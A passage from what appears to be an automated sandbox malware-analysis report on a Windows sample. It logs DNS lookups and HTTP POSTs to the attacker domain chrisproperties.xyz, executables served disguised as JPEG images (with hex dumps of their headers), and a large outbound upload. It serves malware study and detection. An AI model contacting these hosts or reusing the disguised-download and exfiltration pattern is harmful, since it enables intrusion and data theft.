e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:38 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Thu, 06 Jun 2019 09:01:44 GMT ETag: "1303d0-58aa3f6888e00" Accept-Ranges: bytes Content-Length: 1246160 Vary: User-Agent Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:39 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Thu, 06 Jun 2019 09:02:02 GMT ETag: "14748-58aa3f79b3680" Accept-Ranges: bytes Content-Length: 83784 Vary: User-Agent Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Users\user\Desktop\buIKlB688e.exe

DNS query: chrisproperties.xyz

Posts data to a JPG file (protocol mismatch)

Show sources

Source: unknown

HTTP traffic detected: POST /6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--

Source: Joe Sandbox View

ASN Name: AS-REGRU AS-REGRU

Source: global traffic	HTTP traffic detected: POST /6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /1.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /2.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /3.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /4.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /5.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /7.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /main.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 77595Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 195.133.18.140 195.133.18.140

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Oct 2021 10:35:34 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Thu, 06 Jun 2019 09:01:52 GMTETag: "235d0-58aa3f702a000"Accept-Ranges: bytesContent-Length: 144848Vary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Oct 2021 10:35:34 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Mon, 07 Aug 2017 00:52:20 GMTETag: "9d9d8-5561f424ef900"Accept-Ranges: bytesContent-Length: 645592Vary: User-AgentKeep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Oct 2021 10:35:36 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Thu, 06 Jun 2019 09:00:58 GMTETag: "519d0-58aa3f3caa680"Accept-Ranges: bytesContent-Length: 334288Vary: User-AgentKeep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 